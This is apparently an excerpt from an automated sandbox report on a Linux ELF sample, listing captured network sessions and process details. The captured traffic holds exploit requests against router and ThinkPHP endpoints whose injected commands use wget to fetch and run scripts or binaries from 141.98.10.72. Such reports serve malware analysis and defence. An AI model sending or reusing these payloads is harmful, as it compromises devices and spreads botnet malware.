                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269928932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1062192.168.2.154606894.122.85.388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:19.625919104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1063192.168.2.155017494.122.49.1458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:19.627377987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1064192.168.2.154631095.78.125.1288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:19.628093004 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:19.879460096 CET224INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1065192.168.2.1556622112.187.12.11180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:20.467139959 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1066192.168.2.154587294.110.203.798080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.127902031 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1067192.168.2.155352231.136.194.1948080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.128042936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.838927031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.247174978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:27.126837015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:32.758577108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:44.022444010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:07.317622900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1068192.168.2.153376662.29.49.1478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.152719975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1069192.168.2.153580094.123.91.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.153083086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1070192.168.2.154025294.214.44.2058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.386595964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1071192.168.2.155310085.74.232.1838080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.392992020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.635240078 CET388INHTTP/1.1 404 Not Found
                                                      Date: Sun, 04 Jan 1970 10:35:04 GMT
                                                      Server: DNVRS-Webs
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1072192.168.2.153926431.136.181.2028080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.559844017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:23.254829884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.598771095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:27.382694960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:32.758588076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:43.510284901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269860983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1073192.168.2.155538685.247.19.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.633558989 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.894697905 CET433INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:21 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1074192.168.2.154628694.122.5.1648080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.634296894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1075192.168.2.154826262.219.113.638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:22.655668020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      System Behavior

                                                      Start time (UTC):08:28:43
                                                      Start date (UTC):14/02/2024
                                                      Path:/tmp/E6l0C6FObI.elf
                                                      Arguments:/tmp/E6l0C6FObI.elf
                                                      File size:5773336 bytes
                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                      Start time (UTC):08:28:43
                                                      Start date (UTC):14/02/2024
                                                      Path:/tmp/E6l0C6FObI.elf
                                                      Arguments:-
                                                      File size:5773336 bytes
                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                      Start time (UTC):08:28:43
                                                      Start date (UTC):14/02/2024
